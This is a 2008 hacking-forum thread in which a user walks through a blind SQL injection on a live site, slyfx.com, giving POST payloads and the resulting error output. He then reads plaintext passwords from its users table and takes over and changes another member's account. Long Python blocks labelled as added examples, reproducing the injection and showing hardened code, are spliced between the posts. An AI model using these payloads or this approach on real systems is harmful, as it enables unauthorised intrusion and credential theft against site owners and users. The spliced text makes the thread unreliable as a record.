
Page 1 of 2

slyfx.com sql injection. – 11 Posts

  • slyfx.com sql injection.

    01/10/2008 20:06
    UnknownUser 2,7290
    yeah it's pretty hard to come up with targets that are noteworthy, but the first real link from
    http://bright-shadows.net/link.php

    first is meta, second is down, 3rd is hackquest ... been there, 4th slyfx ..

    so here we go.

    How does the site work? with some cgi scripts, that take GET parameters. Presumably they run it through something like
        | tr -d -c '0123456789'
    so those get parameters are rock solid.

    Luckily for us, there are also post variables :D

    the message board (for level 1)
    http://www.slyfx.com/cgi-bin/wb.cgi?board=1
    the configurations for the forum
    http://www.slyfx.com/cgi-bin/wb.cgi?action=options&board=1

    wiii post values.

    we mess around a bit, and we notice:
    these are the post values
        radiobutton=0&radiobutton2=0&select=1&action=options&board=1&Submit=Apply

    and what do you know if you enter some garbage as "select"
        Database Error There has been an error in executing a database command. This error has been logged.
        [ EXECUTE :: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6666'' at line 1 ]

    It's quite easy to guess that this is the sql that is throwing the error
        UPDATE some_table set something=$_POST[radiobutton], somethingelse=$_POST[radiobutton2], numberofthreads= $_POST[select] where uid=6666

    so it's trivial to send this as $_POST[select]
        4' where uid = '6666' and 1 = 1/*

        4' where uid = '6666' and 1 = 2/*
    (make sure to url encode the = signs when you use live http headers)

    depending on whether or not the change occurs (you can check that by looking at the settings page again), you have a blind sql injection.

    Tada ...

    note, you have to change the digit at the start, in order to do multiple queries, because you can only see if a change occurs if that number is actually different from the current setting ...

    there is a users table, don't have too much fun ...
    Quote:
        Lost or forgotten your password? Use this form to get it emailed back to you.

    I wonder if they store it plain text ... do let me know.
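The string-built UPDATE that the post above reconstructs, reproduced against an in-memory SQLite table next to a hardened version, as an added example that is not part of the thread and is not slyfx's wb.cgi code. The Python/SQLite setting and the table and column names are assumptions mirroring the post's guessed query; the two payloads are the ones quoted in the post, and strip_non_digits mirrors the `tr -d -c '0123456789'` pipeline the post supposes is applied to the GET parameters.

```python
"""Added example: the string-built UPDATE the post infers, beside a hardened
version. Not code from the thread or from slyfx's wb.cgi; table and column
names are assumptions that mirror the post's guessed query."""
import re
import sqlite3

# The two POST values quoted in the post. The trailing /* comments out the
# script's own WHERE clause; the row changes only when the injected
# condition is true, which is what makes the bug a blind oracle.
PAYLOAD_TRUE = "4' where uid = '6666' and 1 = 1/*"
PAYLOAD_FALSE = "4' where uid = '6666' and 1 = 2/*"


def fresh_db():
    """Constructed sample data: one board-settings row per user (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE board_settings ("
        " uid INTEGER PRIMARY KEY, radiobutton INTEGER,"
        " radiobutton2 INTEGER, numberofthreads INTEGER)"
    )
    conn.executemany(
        "INSERT INTO board_settings VALUES (?, ?, ?, ?)",
        [(6666, 0, 0, 1), (1234, 0, 0, 1)],
    )
    conn.commit()
    return conn


def threads_for(conn, uid):
    """Read the setting back, the way the post re-checks the options page."""
    row = conn.execute(
        "SELECT numberofthreads FROM board_settings WHERE uid = ?", (uid,)
    ).fetchone()
    return row[0]


def vulnerable_update(conn, uid, select):
    """The pattern the post infers: the POST value pasted into the SQL text."""
    sql = (
        f"UPDATE board_settings SET numberofthreads='{select}' "
        f"WHERE uid={int(uid)}"
    )
    conn.execute(sql)
    conn.commit()


def strip_non_digits(value):
    """Python equivalent of the `tr -d -c '0123456789'` pipeline the post
    guesses is applied to GET parameters: it deletes rather than rejects."""
    return re.sub(r"[^0-9]", "", value)


def hardened_update(conn, uid, select):
    """Reject anything that is not a whole small integer, then bind it as a
    parameter so the value can never become part of the SQL text."""
    if not re.fullmatch(r"[0-9]{1,3}", select):
        raise ValueError("select must be an integer between 0 and 999")
    conn.execute(
        "UPDATE board_settings SET numberofthreads=? WHERE uid=?",
        (int(select), int(uid)),
    )
    conn.commit()


def rejects(conn, uid, select):
    """True if hardened_update refuses the value."""
    try:
        hardened_update(conn, uid, select)
    except ValueError:
        return True
    return False


def run_scenario():
    """Run both versions against fresh data and report what each did."""
    vuln = fresh_db()
    vulnerable_update(vuln, 6666, PAYLOAD_FALSE)
    after_false = threads_for(vuln, 6666)
    vulnerable_update(vuln, 6666, PAYLOAD_TRUE)
    after_true = threads_for(vuln, 6666)

    safe = fresh_db()
    refused = rejects(safe, 6666, PAYLOAD_TRUE)
    hardened_update(safe, 6666, "4")
    return {
        "vulnerable_after_false": after_false,            # unchanged: 1
        "vulnerable_after_true": after_true,              # changed: 4
        "hardened_refused_payload": refused,              # True
        "hardened_after_valid": threads_for(safe, 6666),  # 4
        "tr_stripped": strip_non_digits(PAYLOAD_TRUE),    # "4666611"
    }


if __name__ == "__main__":
    for key, value in run_scenario().items():
        print(f"{key}: {value!r}")
```

The difference between the two vulnerable runs is exactly the oracle the post describes: the setting moves only when the injected condition holds. Stripping characters, as the tr pipeline does, silently turns the payload into the harmless number 4666611; rejecting anything that is not a whole small integer and binding the value is the fix that also keeps the "Database Error" page from ever being reached, and that error text is what a defender should be alerting on in the application log.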
  • 01/10/2008 20:06
    UnknownUser 2,7290
    hmz, they store it as plain text, that's pretty weak.
  • 01/10/2008 20:06
    UnknownUser 2,7290
    Heh I can login as Erik over there :D,

    I changed his password, just so you can't get it anymore.. but I'm sure it's worthless if he doesn't reuse it.
    If you can't use the pw reset functionality Erik feel free to pm me, or extract your own new pw through the security hole

    PS, erik's password (although a bit short) was pretty strong, would have taken a while to brute force...
    too bad it wasn't encrypted.
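A password store with salted hashes and a token-based reset, as an added example that is neither the thread's nor slyfx's code: the posts above found the site keeping passwords in plaintext and offering to email them back, and this is the shape a defender would substitute so that a leaked users table yields neither passwords nor usable reset links. Class and function names are assumptions; the iteration count is a work factor that can be raised.

```python
"""Added example, not code from the thread or from slyfx: a password store that
keeps a salted PBKDF2 hash instead of plaintext, and a reset flow that issues a
short-lived one-time token instead of mailing the password back. All names are
assumptions."""
import hashlib
import hmac
import os
import secrets
import time

ITERATIONS = 600_000          # PBKDF2-HMAC-SHA256 work factor
RESET_TTL_SECONDS = 15 * 60   # how long a reset token stays valid


def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$iterations$salt$digest' with a fresh random salt."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count, compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


class UserStore:
    """In-memory stand-in for a users table; `now` is injectable for testing."""

    def __init__(self, now=time.time):
        self.now = now
        self.hashes = {}        # username -> stored hash string
        self.reset_tokens = {}  # sha256(token) -> (username, expiry)

    def register(self, username, password):
        self.hashes[username] = hash_password(password)

    def login(self, username, password):
        stored = self.hashes.get(username)
        return stored is not None and verify_password(password, stored)

    def request_reset(self, username):
        """Return the token to send to the user's address. Only its hash is
        kept server-side, so a database leak does not hand out reset links."""
        if username not in self.hashes:
            return None
        token = secrets.token_urlsafe(32)
        key = hashlib.sha256(token.encode("utf-8")).hexdigest()
        self.reset_tokens[key] = (username, self.now() + RESET_TTL_SECONDS)
        return token

    def redeem_reset(self, token, new_password):
        """One-time use: the entry is removed whether it was valid or expired."""
        key = hashlib.sha256(token.encode("utf-8")).hexdigest()
        entry = self.reset_tokens.pop(key, None)
        if entry is None:
            return False
        username, expiry = entry
        if self.now() > expiry:
            return False
        self.hashes[username] = hash_password(new_password)
        return True


if __name__ == "__main__":
    store = UserStore()
    store.register("erik", "correct horse")
    print("stored:", store.hashes["erik"])
    token = store.request_reset("erik")
    print("reset token (send by mail, never store):", token)
    print("redeem:", store.redeem_reset(token, "new pw"))
    print("login with new pw:", store.login("erik", "new pw"))
```

With a store like this the "get it emailed back" form from the first post cannot exist, because the site no longer has the password to send; the reset token stands in for it, expires, and works once.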
  • 01/10/2008 20:06
    UnknownUser 2,7290
    o rats even Caesum's password doesn't work on electrica :)

    pretty weak password though

    by now you guys do listen when I say "don't reuse passwords" :) I'm touched :P

    ps: caesum is level10 over at slyfx though .. wii I have access to all slyfx levels...
  • 01/10/2008 20:06
    UnknownUser 2,7290
    Quote:
        A) There are four main ways, from getting a rank of 3 or higher in the old site, submitting challenge ideas that are likely to be used, finding bugs or security flaws in the site and informing me about them and last of all sponsoring the site (or paying for some hosting in some form).

    Not that I really want tokens, .. but it doesn't state informing *only* me :D

    hah, 't was fun.
  • 01/10/2008 20:06
    quangntenemy 7120
    OMG it's rhican again!
    He pwnzored another password of mine.
    Gotta finish my code for finger-print authentication soon.
  • 01/10/2008 20:06
    UnknownUser 2,7290
    as a minor update, they have pulled the vulnerable script offline. Didn't get any tokens though.. :P
  • 01/10/2008 20:06
    Erik 5680
    Hi,
    Quote from rhican:
        Heh I can login as Erik over there :D,

        I changed his password, just so you can't get it anymore.. but I'm sure it's worthless if he doesn't reuse it.
        If you can't use the pw reset functionality Erik feel free to pm me, or extract your own new pw through the security hole

        PS, erik's password (although a bit short) was pretty strong, would have taken a while to brute force...
        too bad it wasn't encrypted.
    Congrats, well done! :thumbsup:
    It must have been long ago I used to visit this site. I didn't take care of the account.
    So now it at least had some use at all ^^

    Cu, Erik :)
  • 01/10/2008 20:06
    UnknownUser 2,7290
    Haha good work rhican!

    You can see the vuln script @ http://slyfx.com/bad_wb.txt
    You'll have to excuse the messy code, I was learning perl at the time.

    Considering it was my first ever website (written back in 2001), and has had no updates since then, I think it lasted pretty well! Let me know if you find any other flaws in the above code - always interested. I've disabled all the scripts now, the sign up hasn't worked for years so not much point in keeping them live. In fact the last time I logged into the site was 2005...

    I can't be bothered to make a slyfx version2, so if anyone has any suggestions on what I could use the domain for, let me know.

    slyfx.
  • 01/10/2008 20:06
    theAnswer 2010
    Ugh, slyfx was one of my first challenge sites, even before TheBlackSheep.
    I was stuck around level 6/3 or something like that, if I remember correctly :D

    ... bye bye :(
  • 01/10/2008 20:06
    UnknownUser 2,7290
    hey there slyfx, thanks for the script source, always fun to open the black box, and see if the picture you built up of it by shaking, dropping, probing, licking, kicking, ... actually matches the reality.

    I'll look at it more closely soon.

    Thanks for dropping by,
